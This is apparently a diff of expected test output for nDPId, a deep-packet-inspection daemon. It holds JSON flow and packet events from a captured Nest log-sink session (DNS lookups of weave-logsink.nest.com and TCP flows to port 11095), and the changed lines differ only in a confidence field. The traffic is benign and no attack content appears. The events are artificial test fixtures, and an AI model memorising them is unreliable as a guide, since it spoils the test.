00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":376,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":376,"packets-processed":275,"total-skipped-flows":0,"total-l4-payload-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":38,"global_ts_msec":1536716003807} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1536716402804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536716402804,"pkt":"AJD7JidrGLQwJjRACABFAABEL\/cAAP8RJk\/AqPIPwKjyAc5xADUAMDxpd90BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1536716402805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536716402805,"pkt":"GLQwJjRAAJD7JidrCABFAABUcEtAAEARZOvAqPIBwKjyDwA1znEAQGW0d92BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536716402804,"flow_last_seen":1536716402805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536716402805,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536716402804,"flow_last_seen":1536716402805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536716402805,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402828,"flow_last_seen":1536716402828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716402828,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1536716402828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716402828,"pkt":"AJD7JidrGLQwJjRACABFAAAsL\/gAAP8GGqXAqPIPI7yauvdxK1cI4Q21AAAAAGACEgDczAAAAgQEgAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1536716402889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716402889,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93El8kNOCOENtmASbvAVfwAAAgQFjA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1536716402894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716402894,"pkt":"AJD7JidrGLQwJjRACABFAAAoL\/kAAP8GGqjAqPIPI7yauvdxK1cI4Q22JfJDT1AQEgCKBAAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1536716407003,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1536716407003,"pkt":"AJD7JidrGLQwJjRACABFAABXMB8AAP8RJhTAqPIPwKjyAc5xADUAQ16pMiMBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716407119,"flow_last_seen":1536716407119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716407119,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1536716407119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716407119,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCAAAP8GYljAqPIPI65S7fdyK1cI7G5zAAAAAGACEgDD3QAAAgQEgAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1536716407186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716407186,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93Kf6ho7COxudGASaQOxbwAAAgQFtA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1536716407188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716407188,"pkt":"AJD7JidrGLQwJjRACABFAAAoMCEAAP8GYlvAqPIPI65S7fdyK1cI7G50n+oaPFAQEgAgMAAAAAAAAAAA"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716409847,"flow_last_seen":1536716409847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716409847,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1536716409847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716409847,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCwAAP8GGnHAqPIPI7yauvdzK1cI9889AAAAAGACEgAbLAAAAgQEgAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1536716409908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716409908,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93M4S\/jECPfPPmASbvCMDgAAAgQFjA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1536716409910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716409910,"pkt":"AJD7JidrGLQwJjRACABFAAAoMC0AAP8GGnTAqPIPI7yauvdzK1cI988+OEv4xVAQEgAAlAAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536716592575,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536716592575,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":547,"packets-processed":424,"total-skipped-flows":0,"total-l4-payload-len":43270,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1536716652586} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":595,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":595,"packets-processed":452,"total-skipped-flows":0,"total-l4-payload-len":43270,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":1536717254253} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717427961,"flow_last_seen":1536717427961,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536717427961,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1536717427961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536717427961,"pkt":"AJD7JidrGLQwJjRACABFAABEME8AAP8RJffAqPIPwKjyAc5xADUAMGWoTp4BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717427961,"flow_last_seen":1536717427961,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536717427961,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717427961,"flow_last_seen":1536717427961,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536717427961,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1536717427984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536717427984,"pkt":"AJD7JidrGLQwJjRACABFAABEMFAAAP8RJfbAqPIPwKjyAc5xADUAMGWoTp4BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1536717428084,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536717428084,"pkt":"GLQwJjRAAJD7JidrCABFAABUzkdAAEARBu\/AqPIBwKjyDwA1znEAQGW0Tp6BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1536717427961,"flow_last_seen":1536717428084,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1536717428084,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 